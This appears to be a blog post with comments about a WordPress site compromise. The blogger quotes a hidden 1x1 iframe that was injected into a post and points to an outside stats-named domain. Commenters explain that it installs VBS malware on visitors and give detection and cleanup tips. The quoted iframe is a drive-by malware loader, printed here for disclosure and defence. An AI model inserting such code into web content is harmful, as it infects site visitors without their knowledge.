I was going through some old posts just now, and discovered this little treat embedded in a post:
<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->
The code that it’s loading (I know it doesn’t wrap, I don’t really care.) Code deleted. Thanks to Mike Peters for the follow-up in the comments:
This code got sql injected into your wp_posts.
Make sure you upgrade to the 2.3.2 version of WordPress:
http://wordpress.org/support/topic/151888What it does is attempt to install a VBS malware on your machine using an xmlrpc exploit in older versions of WordPress.
Look for something like this in your server logs -
200.216.67.181 - - [28/Jan/2008:13:10:54 -0500] “POST /xmlrpc.php HTTP/1.0″
Once you view the post, you’re infected - the VBS code will be installed and you’re going to need to run NOD32 or AVG to clean it up
Someone with more patience than myself will probably take the time to disassemble that.
To find the post titles in your blog that might be affected, in SQL do:
mysql> select post_title from wp_posts where post_content like '%Statistics%';
Try this out for a fellow lazy bum.
Allows you to cut and paste encoded/decoded stuff for javascript.
http://www.the-art-of-web.com/javascript/escape/
Yeah thats a start but it will take a bit more work to figure out exactly what it does.
This code got sql injected into your wp_posts.
Make sure you upgrade to the 2.3.2 version of WordPress:
http://wordpress.org/support/topic/151888
What it does is attempt to install a VBS malware on your machine using an xmlrpc exploit in older versions of WordPress.
Look for something like this in your server logs -
200.216.67.181 - - [28/Jan/2008:13:10:54 -0500] “POST /xmlrpc.php HTTP/1.0″
Once you view the post, you’re infected - the VBS code will be installed and you’re going to need to run NOD32 or AVG to clean it up
If you run Windows
So true
[...] looked over to my right, and there was Dave Dellanave, Shoemoney’s ace programmer sitting 3 feet across the isle from me banging away on the keys creating fighters.com their new [...]